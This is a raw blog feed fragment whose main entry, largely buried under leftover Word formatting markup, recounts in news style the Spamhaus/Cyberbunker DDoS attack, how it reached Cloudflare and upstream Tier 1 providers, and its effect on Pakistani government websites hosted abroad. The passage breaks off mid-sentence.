&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=St-ylsbeSQk:E51GVmjh62c:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=St-ylsbeSQk:E51GVmjh62c:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=St-ylsbeSQk:E51GVmjh62c:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=St-ylsbeSQk:E51GVmjh62c:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=St-ylsbeSQk:E51GVmjh62c:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=St-ylsbeSQk:E51GVmjh62c:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=St-ylsbeSQk:E51GVmjh62c:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=St-ylsbeSQk:E51GVmjh62c:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=St-ylsbeSQk:E51GVmjh62c:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=St-ylsbeSQk:E51GVmjh62c:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=St-ylsbeSQk:E51GVmjh62c:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/St-ylsbeSQk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/8141988278918301637/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/04/zeus-master-turned-down-israel.html#comment-form" title="5 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8141988278918301637?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8141988278918301637?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/St-ylsbeSQk/zeus-master-turned-down-israel.html" title="Zeus Master turned down Israel" /><author><name>FaHaD aWaN</name><uri>http://www.blogger.com/profile/11388036707127075893</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-LV6u9JUbGzE/UWSINFHh5WI/AAAAAAAAAAo/HiVWwjEawHQ/s72-c/Algerian080113.jpg" height="72" width="72" /><thr:total>5</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/04/zeus-master-turned-down-israel.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0cGRn0_eCp7ImA9WhBWEEU.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-4189183736098328426</id><published>2013-04-04T07:17:00.000-07:00</published><updated>2013-04-04T07:17:07.340-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-04T07:17:07.340-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Website hacking" /><category scheme="http://www.blogger.com/atom/ns#" term="Webserver Security" /><title>Anotomy of The Largest DDOS Attack That Almost Took Down The Internet</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-EoTGr7UZIRE/UV2LI4obmFI/AAAAAAAACwQ/zof98ZK7Jto/s1600/DOS.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="246" src="http://4.bp.blogspot.com/-EoTGr7UZIRE/UV2LI4obmFI/AAAAAAAACwQ/zof98ZK7Jto/s320/DOS.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:TrackMoves/&gt;
  &lt;w:TrackFormatting/&gt;
  &lt;w:PunctuationKerning/&gt;
  &lt;w:ValidateAgainstSchemas/&gt;
  &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;
  &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;
  &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;
  &lt;w:DoNotPromoteQF/&gt;
  &lt;w:LidThemeOther&gt;EN-US&lt;/w:LidThemeOther&gt;
  &lt;w:LidThemeAsian&gt;X-NONE&lt;/w:LidThemeAsian&gt;
  &lt;w:LidThemeComplexScript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
   &lt;w:DontGrowAutofit/&gt;
   &lt;w:SplitPgBreakAndParaMark/&gt;
   &lt;w:DontVertAlignCellWithSp/&gt;
   &lt;w:DontBreakConstrainedForcedTables/&gt;
   &lt;w:DontVertAlignInTxbx/&gt;
   &lt;w:Word11KerningPairs/&gt;
   &lt;w:CachedColBalance/&gt;
  &lt;/w:Compatibility&gt;
  &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
  &lt;m:mathPr&gt;
   &lt;m:mathFont m:val="Cambria Math"/&gt;
   &lt;m:brkBin m:val="before"/&gt;
   &lt;m:brkBinSub m:val="&amp;#45;-"/&gt;
   &lt;m:smallFrac m:val="off"/&gt;
   &lt;m:dispDef/&gt;
   &lt;m:lMargin m:val="0"/&gt;
   &lt;m:rMargin m:val="0"/&gt;
   &lt;m:defJc m:val="centerGroup"/&gt;
   &lt;m:wrapIndent m:val="1440"/&gt;
   &lt;m:intLim m:val="subSup"/&gt;
   &lt;m:naryLim m:val="undOvr"/&gt;
  &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
  LatentStyleCount="267"&gt;
  &lt;w:LsdException Locked="false" Priority="0" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Normal"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 7"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 8"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 9"/&gt;
  &lt;w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/&gt;
  &lt;w:LsdException Locked="false" Priority="10" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Title"/&gt;
  &lt;w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/&gt;
  &lt;w:LsdException Locked="false" Priority="11" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/&gt;
  &lt;w:LsdException Locked="false" Priority="22" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Strong"/&gt;
  &lt;w:LsdException Locked="false" Priority="20" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="59" SemiHidden="false"
   UnhideWhenUsed="false" Name="Table Grid"/&gt;
  &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/&gt;
  &lt;w:LsdException Locked="false" Priority="1" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/&gt;
  &lt;w:LsdException Locked="false" Priority="34" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/&gt;
  &lt;w:LsdException Locked="false" Priority="29" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Quote"/&gt;
  &lt;w:LsdException Locked="false" Priority="30" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="19" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="21" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="31" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/&gt;
  &lt;w:LsdException Locked="false" Priority="32" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/&gt;
  &lt;w:LsdException Locked="false" Priority="33" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/&gt;
  &lt;w:LsdException Locked="false" Priority="37" Name="Bibliography"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/&gt;
 &lt;/w:LatentStyles&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:"Table Normal";
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-priority:99;
 mso-style-qformat:yes;
 mso-style-parent:"";
 mso-padding-alt:0in 5.4pt 0in 5.4pt;
 mso-para-margin-top:0in;
 mso-para-margin-right:0in;
 mso-para-margin-bottom:10.0pt;
 mso-para-margin-left:0in;
 line-height:115%;
 mso-pagination:widow-orphan;
 font-size:11.0pt;
 font-family:"Calibri","sans-serif";
 mso-ascii-font-family:Calibri;
 mso-ascii-theme-font:minor-latin;
 mso-fareast-font-family:"Times New Roman";
 mso-fareast-theme-font:minor-fareast;
 mso-hansi-font-family:Calibri;
 mso-hansi-theme-font:minor-latin;
 mso-bidi-font-family:"Times New Roman";
 mso-bidi-theme-font:minor-bidi;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;br /&gt;
&lt;br /&gt;
Recently, the largest DDOS attack in the history of the internet has been
noticed, According to the reports from various websites; the attack was of more
than 300GB/second. It all started when &lt;b&gt;Spamhaus(NON PROFIT ORGAZNIATION) &lt;/b&gt;that
manages the spam filters for various websites blacklisted a &lt;b&gt;Dutch&lt;/b&gt; based
webhosting company &lt;b&gt;Cyberbunker&lt;/b&gt;, &lt;b&gt;Cyberbunker&lt;/b&gt; allows a user to host everything
else than Child pornography and stuff related to terrorism. This allows an
attacker to host any malicious software such as botnet. A botnet can be used
for variety of purposes ranging from stealing credit card information,
infecting PC's to even denial of service attacks. &lt;br /&gt;
In a interview with bbc, Spamhaus blamed the Cyberbunker for the ongoing
attacks, they said that Cyberbunkers have joined hands with attackers to
perform DDOS attacks in order to compromise the availability.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
The attack was a Denial of service attacks, which is often used by attackers
to compromise the availability of the website by flooding the website with huge
number of packets (In most cases), The DDOS attack was aimed at the DNS servers
of &lt;b style="mso-bidi-font-weight: normal;"&gt;Spamhaus&lt;/b&gt;, A DNS server is
responsible for the translation of an IP address to domain name, In simple
words, When we are accessing any website on the internet, on the back end we
are actually accessing the IP address, DNS simplifies the process.&lt;br /&gt;
&lt;br /&gt;
The experts call the attack as the biggest DDOS attack in the history of the
internet, Normally, when we talk about a massive DDOS attack against huge
infrastructures, It ranges from &lt;br /&gt;
30 to 50 GB per second of traffic, however this attack was more than 300gbps
per traffic. The company moved to &lt;b style="mso-bidi-font-weight: normal;"&gt;Cloudfare&lt;/b&gt;
(A web performance and security company) in order to protect their services
from been taken down, Initially they were receiving 10GBPS of traffic, but it
got even the worse the attack and the highest peak noted was around 300GBPS.
However, instead of going after Spamhaus the attackers targeted Cloudfare
itself, the attackers failed to knock Cloudfare servers, even after a 100GIGS
of traffic, after that they targeted the bandwidth providers of Cloudfare known
as "Tier2", who itself buy bandwidth from
Tier1 provider. The major traffic load was carried out by Tier1, which reported
more than 300GBPS of traffic, making it the largest DDOS attack ever.&lt;br /&gt;
&lt;br /&gt;
Now, one might think that, how is it slowing down the internet?, it's
because, this is how the internet works as internet is simply a collection of
networks, Let's say, when we are connecting to google.com from Pakistan, our
browser sends a http requests, the browser sends/receives a packets which are
hopped across lots of routers/networks in between until they reach the Google
servers. As mentioned previously Tier2 buys bandwidth from Tier1, Tier1
connects to other Tier1 providers to ensure that all the networks are connected
with each other.Tier1 providers are the core of the internet, the Tier1 provider
ended up suffering all the traffic. It is reported by Cloudfare that Tier1
providers for Europe were affected, as a reason of which, internet slowdown was
noticed for people surfing the internet in those areas. However, In Pakistan,
the severity was very low, therefore major slow down was not noticed.&lt;br /&gt;
&lt;br /&gt;
Lots of Pakistani&amp;nbsp;websites&amp;nbsp;are hosted abroad, the following is the list of
them:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;www.pakistan.gov.pk&lt;/b&gt;
(Main Pakistan Government Portal)&lt;br /&gt;
&lt;b&gt;www.infopak.gov.pk&lt;/b&gt;
(Ministry of Information and Broadcasting)&lt;br /&gt;
&lt;b&gt;www.interior.gov.pk&lt;/b&gt;
(Ministry of Interior)&lt;br /&gt;
&lt;b&gt;www.e-government.gov.pk&lt;/b&gt;
(E Government Directorate)&lt;br /&gt;
&lt;b&gt;www.pta.gov.pk&lt;/b&gt;
(Pakistan Telecom Authority)&lt;br /&gt;
&lt;b&gt;www.pc.gov.pk&lt;/b&gt;
(Planning Commission)&lt;br /&gt;
&lt;b&gt;www.sindh.gov.pk&lt;/b&gt;
(Government of Sindh)&lt;br /&gt;
&lt;br /&gt;
As as result of the outage they are suffering the outage and lots of
Pakistani users are not able to access the websites, If we host these servers
in Pakistan, Initially the attack would be mitigated, however it would raise a
lot of security concerns, Since Pakistani servers would be more easy for
attackers to compromise and knock them off, due to poor security and patch
management. Also, I don't see any of the protection against DOS attacks; perhaps
if they could acquire &lt;b&gt;Cloudfare &lt;/b&gt;protection services, the DOS attacks would be
